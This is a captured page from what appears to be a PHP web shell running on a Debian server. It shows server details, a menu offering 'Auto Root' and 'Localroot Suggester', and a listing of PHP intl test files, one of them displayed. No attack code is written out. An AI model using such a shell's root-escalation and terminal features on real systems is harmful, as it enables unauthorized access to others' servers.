Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.112
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
src /
php-7.4.33 /
ext /
intl /
uchar /
tests /
Delete
Unzip
Name
Size
Permission
Date
Action
basic-functionality.phpt
4.03
KB
-rw-rw-r--
2022-10-31 11:36
bug70453.phpt
576
B
-rw-rw-r--
2022-10-31 11:36
bug70454.phpt
401
B
-rw-rw-r--
2022-10-31 11:36
bug70455.phpt
312
B
-rw-rw-r--
2022-10-31 11:36
Save
Rename
--TEST-- Bug #70453 (IntlChar::foldCase() incorrect arguments and missing constants) --SKIPIF-- <?php if (!extension_loaded('intl')) die("skip requires ext/intl") ?> --FILE-- <?php $method = new ReflectionMethod('IntlChar', 'foldCase'); $param = $method->getParameters()[1]; var_dump($param->name, $param->isOptional(), $param->isPassedByReference()); var_dump(IntlChar::foldCase('I', IntlChar::FOLD_CASE_DEFAULT)); var_dump(IntlChar::foldCase('I', IntlChar::FOLD_CASE_EXCLUDE_SPECIAL_I)); ?> --EXPECT-- string(7) "options" bool(true) bool(false) string(1) "i" string(2) "ı"